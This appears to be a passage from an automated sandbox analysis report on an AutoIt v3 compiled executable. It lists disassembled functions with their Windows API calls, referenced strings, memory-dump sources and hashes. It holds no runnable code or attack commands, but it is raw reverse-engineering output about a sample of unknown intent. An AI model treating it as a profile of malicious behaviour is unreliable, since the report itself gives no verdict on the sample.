                                                                                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                  • String ID: AutoIt v3 GUI
                                                                                                                                  • API String ID: 1458621304-248962490
                                                                                                                                  • Opcode ID: 0226609958bb7b2778b48cab5687e8a615bb3311b23a4ca16ff091133168402d
                                                                                                                                  • Instruction ID: aae9ee20efc5128e4741dcb8a718b18b4771aa717ae59dcc6d9b2d3f1eee1cf7
                                                                                                                                  • Opcode Fuzzy Hash: 0226609958bb7b2778b48cab5687e8a615bb3311b23a4ca16ff091133168402d
                                                                                                                                  • Instruction Fuzzy Hash: E0B14871A0020AAFDB14DFA8DC45BEE7BB4FB48314F194229FA15A7290DB74E841EB51
                                                                                                                                  APIs
                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00F06A52
                                                                                                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00F06B12
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                  • API String ID: 3974292440-719923060
                                                                                                                                  • Opcode ID: ecf2eb678fe17d4b95fbfba3498eea8017973a48ca5341238afe141a23b08386
                                                                                                                                  • Instruction ID: d5aebd0045340a128c790407cbbba143f2e2442a98fa66ceabf59a954f9e6e12
                                                                                                                                  • Opcode Fuzzy Hash: ecf2eb678fe17d4b95fbfba3498eea8017973a48ca5341238afe141a23b08386
                                                                                                                                  • Instruction Fuzzy Hash: A5A182706042019BCB08EF14C951A6AB7E5FF89364F14982DF996AB3D2DB30EC19EB41
                                                                                                                                  APIs
                                                                                                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 00EDE6E1
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EDE6F2
                                                                                                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 00EDE71A
                                                                                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 00EDE737
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EDE755
                                                                                                                                  • _wcsstr.LIBCMT ref: 00EDE766
                                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00EDE79E
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EDE7AE
                                                                                                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 00EDE7D5
                                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00EDE81E
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EDE82E
                                                                                                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 00EDE856
                                                                                                                                  • GetWindowRect.USER32(00000004,?), ref: 00EDE8BF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                  • String ID: @$ThumbnailClass
                                                                                                                                  • API String ID: 1788623398-1539354611
                                                                                                                                  • Opcode ID: 776fbe1378706a68203460f866e70055b99cb05aaee79d71c68e6ec3de7e4162
                                                                                                                                  • Instruction ID: 855b7eccb0974bcc615ac325d95d8949f62e91ff5bb5170851868c190844295f
                                                                                                                                  • Opcode Fuzzy Hash: 776fbe1378706a68203460f866e70055b99cb05aaee79d71c68e6ec3de7e4162
                                                                                                                                  • Instruction Fuzzy Hash: 3A8191310042499BDB15EF10C889FAA7BE8EF44718F14A46BFD85AE295DB30DD46CBA1
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __wcsnicmp
                                                                                                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                  • API String ID: 1038674560-1810252412
                                                                                                                                  • Opcode ID: 49ca8e3f9bd3283324d600bb42d8fd65b0ffc41e23ad34c0ed36ac3a71a88ee6
                                                                                                                                  • Instruction ID: 2d3a4e66e4ab0ac0937ec1e7f3d9ec97d49c85d055c961d220f77cdef4db41eb
                                                                                                                                  • Opcode Fuzzy Hash: 49ca8e3f9bd3283324d600bb42d8fd65b0ffc41e23ad34c0ed36ac3a71a88ee6
                                                                                                                                  • Instruction Fuzzy Hash: 12310231904205A6CA18FB10DE17EEE73E4AF16B69F20211AFA51782D6FF51BF09C612
                                                                                                                                  APIs
                                                                                                                                  • LoadIconW.USER32(00000063), ref: 00EDF8AB
                                                                                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00EDF8BD
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00EDF8D4
                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00EDF8E9
                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00EDF8EF
                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00EDF8FF
                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00EDF905
                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00EDF926
                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00EDF940
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00EDF949
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00EDF9B4
                                                                                                                                  • GetDesktopWindow.USER32 ref: 00EDF9BA
                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00EDF9C1
                                                                                                                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00EDFA0D
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00EDFA1A
                                                                                                                                  • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00EDFA3F
                                                                                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00EDFA6A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3869813825-0
                                                                                                                                  • Opcode ID: f8f7dc84bd2dad55b7b567bc6b0f693c3ba3eccd505d6d900a5ca3c3d23cf3a3
                                                                                                                                  • Instruction ID: 075896aedba3df1792a37c90eb575b08b5142c2fcb7f9b0250a50608e22d834c
                                                                                                                                  • Opcode Fuzzy Hash: f8f7dc84bd2dad55b7b567bc6b0f693c3ba3eccd505d6d900a5ca3c3d23cf3a3
                                                                                                                                  • Instruction Fuzzy Hash: 81517D70900709AFDB20DFA8CD89F6EBBF5FF04709F104929E596A26A0C774A946DF50
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00F0CD0B
                                                                                                                                  • DestroyWindow.USER32(00000000,?), ref: 00F0CD83
                                                                                                                                    • Part of subcall function 00EA7E53: _memmove.LIBCMT ref: 00EA7EB9
                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F0CE04
                                                                                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F0CE26
                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F0CE35
                                                                                                                                  • DestroyWindow.USER32(?), ref: 00F0CE52
                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00EA0000,00000000), ref: 00F0CE85
                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F0CEA4
                                                                                                                                  • GetDesktopWindow.USER32 ref: 00F0CEB9
                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00F0CEC0
                                                                                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F0CED2
                                                                                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F0CEEA
                                                                                                                                    • Part of subcall function 00EBB155: GetWindowLongW.USER32(?,000000EB), ref: 00EBB166
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                  • String ID: 0$tooltips_class32
                                                                                                                                  • API String ID: 1297703922-3619404913
                                                                                                                                  • Opcode ID: b8a47e6967cc146fbcab2d6f58a8f173bf989be48c47b4be182e98c087d4f4cb
                                                                                                                                  • Instruction ID: a44b9d55ad3d56f8434efc26e501bc109f15939150a9f4d5ca702a9986ddfad1
                                                                                                                                  • Opcode Fuzzy Hash: b8a47e6967cc146fbcab2d6f58a8f173bf989be48c47b4be182e98c087d4f4cb
                                                                                                                                  • Instruction Fuzzy Hash: 3B719B71640309AFE725CF28CC45FAA7BE9FB89714F58061CF985972A1D770E802EB91
                                                                                                                                  APIs
                                                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 00EEB46D
                                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00EEB476
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00EEB482
                                                                                                                                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00EEB561
                                                                                                                                  • __swprintf.LIBCMT ref: 00EEB591
                                                                                                                                  • VarR8FromDec.OLEAUT32(?,?), ref: 00EEB5BD
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00EEB63F
                                                                                                                                  • SysFreeString.OLEAUT32(00000016), ref: 00EEB6D1
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00EEB727
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00EEB736
                                                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 00EEB772
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                  • API String ID: 3730832054-3931177956
                                                                                                                                  • Opcode ID: e86efac128784a10c1d2bf0a38d785bcd993211fdfe5e97f3a8067446b87f796
                                                                                                                                  • Instruction ID: 40d20cc9f2576a0aa9667fa188f79544e32a80945ae2d4c4da89c5f07db7d4bf
                                                                                                                                  • Opcode Fuzzy Hash: e86efac128784a10c1d2bf0a38d785bcd993211fdfe5e97f3a8067446b87f796
                                                                                                                                  • Instruction Fuzzy Hash: B7C1F57190025ADBCB20DF6AD844BABB7F4FF45300F249465E425BB582EB70EC44DB91
                                                                                                                                  APIs
                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00F06FF9
                                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F07044
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                  • API String ID: 3974292440-4258414348
                                                                                                                                  • Opcode ID: 493909e01be090a389bccc7ae5108fbd6fca0374ee791d2ef0f51615d73d1ecf
                                                                                                                                  • Instruction ID: 58abe75ad7f17fb4191cf6884d9d99c819525de26968d19825d49675cd7cd300
                                                                                                                                  • Opcode Fuzzy Hash: 493909e01be090a389bccc7ae5108fbd6fca0374ee791d2ef0f51615d73d1ecf
                                                                                                                                  • Instruction Fuzzy Hash: 5B9181746083019FCB14EF14C851A6AB7E2AF48364F04989DF8956B3E2DB31FD4AEB41
                                                                                                                                  APIs
                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F0E3BB
                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00F09615,?), ref: 00F0E417
                                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F0E457
                                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F0E49C
                                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F0E4D3
                                                                                                                                  • FreeLibrary.KERNEL32(?,00000004,?,?,?,00F09615,?), ref: 00F0E4DF
                                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F0E4EF
                                                                                                                                  • DestroyCursor.USER32(?), ref: 00F0E4FE
                                                                                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F0E51B
                                                                                                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F0E527
                                                                                                                                    • Part of subcall function 00EC1BC7: __wcsicmp_l.LIBCMT ref: 00EC1C50
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                                                                                                  • String ID: .dll$.exe$.icl
                                                                                                                                  • API String ID: 3907162815-1154884017
                                                                                                                                  • Opcode ID: e42ccc756b405c1f40f12d864c33b361f9b7f85d54ff091e16107423918e1cf1
                                                                                                                                  • Instruction ID: 197635f70a5f4b1ad6cef1e1fcaefe9b539251b89ad06838be6fcb1841c177c7
                                                                                                                                  • Opcode Fuzzy Hash: e42ccc756b405c1f40f12d864c33b361f9b7f85d54ff091e16107423918e1cf1
                                                                                                                                  • Instruction Fuzzy Hash: 9F61CF71A40218BFEB24DF64CC46FEA7BA8AB09720F104505F911E70D1DBB4E981EBA0
                                                                                                                                  APIs
                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 00EF0EFF
                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EF0F0F
                                                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00EF0F1B
                                                                                                                                  • __wsplitpath.LIBCMT ref: 00EF0F79
                                                                                                                                  • _wcscat.LIBCMT ref: 00EF0F91
                                                                                                                                  • _wcscat.LIBCMT ref: 00EF0FA3
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00EF0FB8
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00EF0FCC
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00EF0FFE
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00EF101F
                                                                                                                                  • _wcscpy.LIBCMT ref: 00EF102B
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00EF106A
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                                  • String ID: *.*
                                                                                                                                  • API String ID: 3566783562-438819550
                                                                                                                                  • Opcode ID: e308dc713b8163f8549053b009fa5c4127cc59a358548ee5e8071917b984da19
                                                                                                                                  • Instruction ID: 0b4ef9a84cdf00918e184cbbdeb0fa6d5921a45f98287fccf59449d81055c0e2
                                                                                                                                  • Opcode Fuzzy Hash: e308dc713b8163f8549053b009fa5c4127cc59a358548ee5e8071917b984da19
                                                                                                                                  • Instruction Fuzzy Hash: 626170725043499FCB10EF20C8449AFB7E8FF89314F14995EFA89A7251EB31E945CB92
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA84A6: __swprintf.LIBCMT ref: 00EA84E5
                                                                                                                                    • Part of subcall function 00EA84A6: __itow.LIBCMT ref: 00EA8519
                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00EEDB26
                                                                                                                                  • GetDriveTypeW.KERNEL32 ref: 00EEDB73
                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EEDBBB
                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EEDBF2
                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EEDC20
                                                                                                                                    • Part of subcall function 00EA7E53: _memmove.LIBCMT ref: 00EA7EB9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                  • API String ID: 2698844021-4113822522
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00F14085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00EE3145
                                                                                                                                  • LoadStringW.USER32(00000000,?,00F14085,00000016), ref: 00EE314E
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00F14085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00EE3170
                                                                                                                                  • LoadStringW.USER32(00000000,?,00F14085,00000016), ref: 00EE3173
                                                                                                                                  • __swprintf.LIBCMT ref: 00EE31B3
                                                                                                                                  • __swprintf.LIBCMT ref: 00EE31C5
                                                                                                                                  • _wprintf.LIBCMT ref: 00EE326C
                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00EE3283
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                  • API String ID: 984253442-2268648507
                                                                                                                                  APIs
                                                                                                                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00EED96C
                                                                                                                                  • __swprintf.LIBCMT ref: 00EED98E
                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00EED9CB
                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00EED9F0
                                                                                                                                  • _memset.LIBCMT ref: 00EEDA0F
                                                                                                                                  • _wcsncpy.LIBCMT ref: 00EEDA4B
                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 00EEDA80
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00EEDA8B
                                                                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00EEDA94
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00EEDA9E
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                  • String ID: :$\$\??\%s
                                                                                                                                  • API String ID: 2733774712-3457252023
                                                                                                                                  APIs
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 884005220-0
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00F0E564
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00F0E57B
                                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00F0E586
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00F0E593
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00F0E59C
                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00F0E5AB
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00F0E5B4
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00F0E5BB
                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00F0E5CC
                                                                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00F2D9BC,?), ref: 00F0E5E5
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00F0E5F5
                                                                                                                                  • GetObjectW.GDI32(?,00000018,000000FF), ref: 00F0E619
                                                                                                                                  • CopyImage.USER32(?,00000000,?,?,00002000), ref: 00F0E644
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00F0E66C
                                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F0E682
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3840717409-0
                                                                                                                                  APIs
                                                                                                                                  • __wsplitpath.LIBCMT ref: 00EF0C93
                                                                                                                                  • _wcscat.LIBCMT ref: 00EF0CAB
                                                                                                                                  • _wcscat.LIBCMT ref: 00EF0CBD
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00EF0CD2
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00EF0CE6
                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00EF0CFE
                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00EF0D18
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00EF0D2A
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                                  • String ID: *.*
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EDB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00EDB903
                                                                                                                                    • Part of subcall function 00EDB8E7: GetLastError.KERNEL32(?,00EDB3CB,?,?,?), ref: 00EDB90D
                                                                                                                                    • Part of subcall function 00EDB8E7: GetProcessHeap.KERNEL32(00000008,?,?,00EDB3CB,?,?,?), ref: 00EDB91C
                                                                                                                                    • Part of subcall function 00EDB8E7: RtlAllocateHeap.NTDLL(00000000,?,00EDB3CB), ref: 00EDB923
                                                                                                                                    • Part of subcall function 00EDB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00EDB93A
                                                                                                                                    • Part of subcall function 00EDB982: GetProcessHeap.KERNEL32(00000008,00EDB3E1,00000000,00000000,?,00EDB3E1,?), ref: 00EDB98E
                                                                                                                                    • Part of subcall function 00EDB982: RtlAllocateHeap.NTDLL(00000000,?,00EDB3E1), ref: 00EDB995
                                                                                                                                    • Part of subcall function 00EDB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00EDB3E1,?), ref: 00EDB9A6
                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00EDB5F7
                                                                                                                                  • _memset.LIBCMT ref: 00EDB60C
                                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00EDB62B
                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00EDB63C
                                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00EDB679
                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00EDB695
                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00EDB6B2
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00EDB6C1
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00EDB6C8
                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EDB6E9
                                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 00EDB6F0
                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00EDB721
                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EDB747
                                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EDB75B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                  • String ID:
                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(00000000), ref: 00EFA2DD
                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00EFA2E9
                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 00EFA2F5
                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00EFA302
                                                                                                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00EFA356
                                                                                                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00EFA392
                                                                                                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00EFA3B6
                                                                                                                                  • SelectObject.GDI32(00000006,?), ref: 00EFA3BE
                                                                                                                                  • DeleteObject.GDI32(?), ref: 00EFA3C7
                                                                                                                                  • DeleteDC.GDI32(00000006), ref: 00EFA3CE
                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 00EFA3D9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                  • String ID: (
                                                                                                                                  APIs
                                                                                                                                  • LoadStringW.USER32(00000066,?,00000FFF), ref: 00EED567
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                  • LoadStringW.USER32(?,?,00000FFF,?), ref: 00EED589
                                                                                                                                  • __swprintf.LIBCMT ref: 00EED5DC
                                                                                                                                  • _wprintf.LIBCMT ref: 00EED68D
                                                                                                                                  • _wprintf.LIBCMT ref: 00EED6AB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                  APIs
                                                                                                                                  • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00EED37F
